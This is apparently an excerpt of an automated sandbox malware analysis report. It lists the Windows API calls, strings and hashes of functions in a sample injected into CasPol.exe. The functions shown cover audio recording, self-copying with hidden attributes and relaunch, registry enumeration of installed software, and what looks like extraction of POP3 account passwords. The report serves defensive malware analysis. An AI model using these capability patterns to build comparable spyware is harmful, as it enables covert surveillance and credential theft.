                                                                                                                                                                          • Instruction Fuzzy Hash: B551C771A00315BBDB10ABA09C99EFE336D9B04755F10416BF901E72D2EFBC8E85865D
                                                                                                                                                                          APIs
                                                                                                                                                                          • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B1CD
                                                                                                                                                                          • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B1E1
                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660B4), ref: 0041B209
                                                                                                                                                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0041B21F
                                                                                                                                                                          • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B260
                                                                                                                                                                          • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B278
                                                                                                                                                                          • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B28D
                                                                                                                                                                          • SetEvent.KERNEL32 ref: 0041B2AA
                                                                                                                                                                          • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B2BB
                                                                                                                                                                          • CloseHandle.KERNEL32 ref: 0041B2CB
                                                                                                                                                                          • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B2ED
                                                                                                                                                                          • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B2F7
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                                                                                                          • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                                                                                                                                                          • API String ID: 738084811-1354618412
                                                                                                                                                                          • Opcode ID: 09cee7633b9e23939470f9bc6a52289f86f1ce1391760338b6670702ea153f43
                                                                                                                                                                          • Instruction ID: 3073296416e4f75d74a960dba2816641598052066ba22d453d93bca4cbe87184
                                                                                                                                                                          • Opcode Fuzzy Hash: 09cee7633b9e23939470f9bc6a52289f86f1ce1391760338b6670702ea153f43
                                                                                                                                                                          • Instruction Fuzzy Hash: 4E51A5B12442056ED714B731DC96EBF379CDB80359F10053FB24A621E2EF789D4986AE
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401D55
                                                                                                                                                                          • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401D7F
                                                                                                                                                                          • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401D8F
                                                                                                                                                                          • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401D9F
                                                                                                                                                                          • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401DAF
                                                                                                                                                                          • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401DBF
                                                                                                                                                                          • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401DD0
                                                                                                                                                                          • WriteFile.KERNEL32(00000000,00472ACA,00000002,00000000,00000000), ref: 00401DE1
                                                                                                                                                                          • WriteFile.KERNEL32(00000000,00472ACC,00000004,00000000,00000000), ref: 00401DF1
                                                                                                                                                                          • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401E01
                                                                                                                                                                          • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401E12
                                                                                                                                                                          • WriteFile.KERNEL32(00000000,00472AD6,00000002,00000000,00000000), ref: 00401E23
                                                                                                                                                                          • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401E33
                                                                                                                                                                          • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401E43
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$Write$Create
                                                                                                                                                                          • String ID: RIFF$WAVE$data$fmt
                                                                                                                                                                          • API String ID: 1602526932-4212202414
                                                                                                                                                                          • Opcode ID: 827ce642555df21a050573d9d5a330f37f16d9829fec6a71b542a6fa22e9225d
                                                                                                                                                                          • Instruction ID: 52f5d26e7cd893c7c7a939122a780f0294375d64c437cdec10b118f5e091287a
                                                                                                                                                                          • Opcode Fuzzy Hash: 827ce642555df21a050573d9d5a330f37f16d9829fec6a71b542a6fa22e9225d
                                                                                                                                                                          • Instruction Fuzzy Hash: 61414D72644208BAE210DB51DD85FBB7FECEB89F54F40041AFA44D6081E7A5E909DBB3
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000001,00407688,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000003,004076B0,xtv,00407709), ref: 004072BF
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004072C8
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072DD
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004072E0
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072F1
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004072F4
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00407305
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00407308
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 00407319
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0040731C
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040732D
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00407330
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                                                                                                                          • API String ID: 1646373207-165202446
                                                                                                                                                                          • Opcode ID: acc633f1adce617efce258e7e3813168510e5abee68bf21287a11e169d765cdb
                                                                                                                                                                          • Instruction ID: 830827c477b4c5a159b6e54fb752daf43fd3ce12eed95b51e760902f95858ec4
                                                                                                                                                                          • Opcode Fuzzy Hash: acc633f1adce617efce258e7e3813168510e5abee68bf21287a11e169d765cdb
                                                                                                                                                                          • Instruction Fuzzy Hash: 66015EA0E4431676DB116F7AAD44D5B7EDD9E41351311087BB405E2292EEBCE800C9AE
                                                                                                                                                                          APIs
                                                                                                                                                                          • _wcslen.LIBCMT ref: 0040CE42
                                                                                                                                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,h}v,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE5B
                                                                                                                                                                          • CopyFileW.KERNEL32 ref: 0040CF0B
                                                                                                                                                                          • _wcslen.LIBCMT ref: 0040CF21
                                                                                                                                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CFA9
                                                                                                                                                                          • CopyFileW.KERNEL32 ref: 0040CFBF
                                                                                                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFFE
                                                                                                                                                                          • _wcslen.LIBCMT ref: 0040D001
                                                                                                                                                                          • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040D018
                                                                                                                                                                          • CloseHandle.KERNEL32 ref: 0040D068
                                                                                                                                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000001), ref: 0040D086
                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 0040D09D
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                                                                                                                          • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$del$hev$h}v$open$xtv
                                                                                                                                                                          • API String ID: 1579085052-1863362863
                                                                                                                                                                          • Opcode ID: 50338bd9006b4bbe80098d29614b74571d66c3dbc6049c3a7372665ca615c5fb
                                                                                                                                                                          • Instruction ID: ff97e746579a928a3d51456624c9bd3823d06e613cf3e42bd6c526c8f9e3827f
                                                                                                                                                                          • Opcode Fuzzy Hash: 50338bd9006b4bbe80098d29614b74571d66c3dbc6049c3a7372665ca615c5fb
                                                                                                                                                                          • Instruction Fuzzy Hash: 8051C620208302ABD615B7769C92A6F67999F84719F10443FF609BA1E3EF7C9C05866E
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 10001CCA: CopyFileW.KERNEL32(?,?,00000000), ref: 10001D1B
                                                                                                                                                                            • Part of subcall function 10001CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 10001D37
                                                                                                                                                                            • Part of subcall function 10001CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                                                                                                                                                                          • _strlen.LIBCMT ref: 10001855
                                                                                                                                                                          • _strlen.LIBCMT ref: 10001869
                                                                                                                                                                          • _strlen.LIBCMT ref: 1000188B
                                                                                                                                                                          • _strlen.LIBCMT ref: 100018AE
                                                                                                                                                                          • _strlen.LIBCMT ref: 100018C8
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _strlen$File$CopyCreateDelete
                                                                                                                                                                          • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                                                                                                          • API String ID: 3296212668-3023110444
                                                                                                                                                                          • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                                                                          • Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
                                                                                                                                                                          • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                                                                          • Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96
                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 0041C0C7
                                                                                                                                                                          • _memcmp.LIBVCRUNTIME ref: 0041C0DF
                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 0041C0F8
                                                                                                                                                                          • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C133
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C146
                                                                                                                                                                          • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C18A
                                                                                                                                                                          • lstrcmpW.KERNEL32(?,?), ref: 0041C1A5
                                                                                                                                                                          • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C1BD
                                                                                                                                                                          • _wcslen.LIBCMT ref: 0041C1CC
                                                                                                                                                                          • FindVolumeClose.KERNEL32(?), ref: 0041C1EC
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0041C204
                                                                                                                                                                          • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C231
                                                                                                                                                                          • lstrcatW.KERNEL32(?,?), ref: 0041C24A
                                                                                                                                                                          • lstrcpyW.KERNEL32(?,?), ref: 0041C259
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0041C261
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                                                                                                          • String ID: ?
                                                                                                                                                                          • API String ID: 3941738427-1684325040
                                                                                                                                                                          • Opcode ID: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                                                                                                                                                          • Instruction ID: 8d48ee17a24f37a9bc83e71ffc922dd471ae74eb47091415c6e266b1ff6a60c4
                                                                                                                                                                          • Opcode Fuzzy Hash: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                                                                                                                                                          • Instruction Fuzzy Hash: B541A671584316EBD720DFA0DC889DBB7ECEB84745F00092BF545D2162EB78CA88CB96
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _strlen
                                                                                                                                                                          • String ID: %m$~$Gon~$~F@7$~dra
                                                                                                                                                                          • API String ID: 4218353326-230879103
                                                                                                                                                                          • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                                                                          • Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
                                                                                                                                                                          • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                                                                          • Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$EnvironmentVariable
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1464849758-0
                                                                                                                                                                          • Opcode ID: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                                                                                                                                                          • Instruction ID: 2409d22e097b45b84bdb59948eb4ebc1cd1141af37d2d18b4001dba56dac1aed
                                                                                                                                                                          • Opcode Fuzzy Hash: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                                                                                                                                                          • Instruction Fuzzy Hash: E3D135B1D003006FFB24AF799D82A6B7BA8EF01314F05417FE945A7382EB7D99098759
                                                                                                                                                                          APIs
                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C742
                                                                                                                                                                          • RegEnumKeyExA.ADVAPI32 ref: 0041C786
                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 0041CA50
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseEnumOpen
                                                                                                                                                                          • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                                                                                                                          • API String ID: 1332880857-3714951968
                                                                                                                                                                          • Opcode ID: bda5a057d1482af4b316a8033d0568fb74c7f5fd769d604243e8b29cd9515908
                                                                                                                                                                          • Instruction ID: 8204223968f620e226549da85b9b34a309c849e8d9bbed411749b7727356edba
                                                                                                                                                                          • Opcode Fuzzy Hash: bda5a057d1482af4b316a8033d0568fb74c7f5fd769d604243e8b29cd9515908
                                                                                                                                                                          • Instruction Fuzzy Hash: 3E8133311082459BC325EF11D851EEFB7E8BF94309F10492FB589921A2FF74AE49CA5A
                                                                                                                                                                          APIs
                                                                                                                                                                          • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D66B
                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 0041D67A
                                                                                                                                                                          • SetForegroundWindow.USER32(?), ref: 0041D683
                                                                                                                                                                          • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D69D
                                                                                                                                                                          • Shell_NotifyIconA.SHELL32(00000002,00474B58), ref: 0041D6EE
                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 0041D6F6
                                                                                                                                                                          • CreatePopupMenu.USER32 ref: 0041D6FC
                                                                                                                                                                          • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D711
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                                                                                                          • String ID: Close
                                                                                                                                                                          • API String ID: 1657328048-3535843008
                                                                                                                                                                          • Opcode ID: 73816c5193d16127c0aec765399ca9dfe531eb1d692a29e38a1feb3416d684dd
                                                                                                                                                                          • Instruction ID: b66198a42bffced696eb94d9f3abdc54ecf3157c52e3fd06dc0985426ba48be4
                                                                                                                                                                          • Opcode Fuzzy Hash: 73816c5193d16127c0aec765399ca9dfe531eb1d692a29e38a1feb3416d684dd
                                                                                                                                                                          • Instruction Fuzzy Hash: 51216BB1500208FFDF054FA4ED0EAAA7B35EB08302F000125FA19950B2D779EDA1EB18
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$Info
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2509303402-0
                                                                                                                                                                          • Opcode ID: 265d55c29888f35ec20f5081f159e7cd252a50d65c59893da787bb4e51b2451e
                                                                                                                                                                          • Instruction ID: 03d8b0dccc9171d7b4ee81f85837dfa1205ba0d7832ce976ccf3d084d520ac26
                                                                                                                                                                          • Opcode Fuzzy Hash: 265d55c29888f35ec20f5081f159e7cd252a50d65c59893da787bb4e51b2451e
                                                                                                                                                                          • Instruction Fuzzy Hash: AFB1CE719002059FEB21DF69C881BEEBBF4BF09304F15842EF495A7242DB79AC458B69
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___free_lconv_mon.LIBCMT ref: 0045138A
                                                                                                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 0045059F
                                                                                                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 004505B1
                                                                                                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 004505C3
                                                                                                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 004505D5
                                                                                                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 004505E7
                                                                                                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 004505F9
                                                                                                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 0045060B
                                                                                                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 0045061D
                                                                                                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 0045062F
                                                                                                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 00450641
                                                                                                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 00450653
                                                                                                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 00450665
                                                                                                                                                                            • Part of subcall function 00450582: _free.LIBCMT ref: 00450677
                                                                                                                                                                          • _free.LIBCMT ref: 0045137F
                                                                                                                                                                            • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                                                                                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                                                                          • _free.LIBCMT ref: 004513A1
                                                                                                                                                                          • _free.LIBCMT ref: 004513B6
                                                                                                                                                                          • _free.LIBCMT ref: 004513C1
                                                                                                                                                                          • _free.LIBCMT ref: 004513E3
                                                                                                                                                                          • _free.LIBCMT ref: 004513F6
                                                                                                                                                                          • _free.LIBCMT ref: 00451404
                                                                                                                                                                          • _free.LIBCMT ref: 0045140F
                                                                                                                                                                          • _free.LIBCMT ref: 00451447
                                                                                                                                                                          • _free.LIBCMT ref: 0045144E
                                                                                                                                                                          • _free.LIBCMT ref: 0045146B
                                                                                                                                                                          • _free.LIBCMT ref: 00451483
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 161543041-0
                                                                                                                                                                          • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                                                                                                                          • Instruction ID: 2428002f6fd8eb1a99257b9b861ac38f7c05b5b97acacff09fd9d8cf260fe807
                                                                                                                                                                          • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                                                                                                                          • Instruction Fuzzy Hash: 403193715003009FEB20AA39D846F5B73E8EF02315F62992FE849D7662DF78AD44C729
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___free_lconv_mon.LIBCMT ref: 10007D06
                                                                                                                                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
                                                                                                                                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
                                                                                                                                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
                                                                                                                                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
                                                                                                                                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
                                                                                                                                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
                                                                                                                                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
                                                                                                                                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
                                                                                                                                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
                                                                                                                                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                                                                                                                                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                                                                                                                                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                                                                                                                                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                                                                                                                                                                          • _free.LIBCMT ref: 10007CFB
                                                                                                                                                                            • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                                                            • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                          • _free.LIBCMT ref: 10007D1D
                                                                                                                                                                          • _free.LIBCMT ref: 10007D32
                                                                                                                                                                          • _free.LIBCMT ref: 10007D3D
                                                                                                                                                                          • _free.LIBCMT ref: 10007D5F
                                                                                                                                                                          • _free.LIBCMT ref: 10007D72
                                                                                                                                                                          • _free.LIBCMT ref: 10007D80
                                                                                                                                                                          • _free.LIBCMT ref: 10007D8B
                                                                                                                                                                          • _free.LIBCMT ref: 10007DC3
                                                                                                                                                                          • _free.LIBCMT ref: 10007DCA
                                                                                                                                                                          • _free.LIBCMT ref: 10007DE7
                                                                                                                                                                          • _free.LIBCMT ref: 10007DFF
                                                                                                                                                                          Memory Dump Source
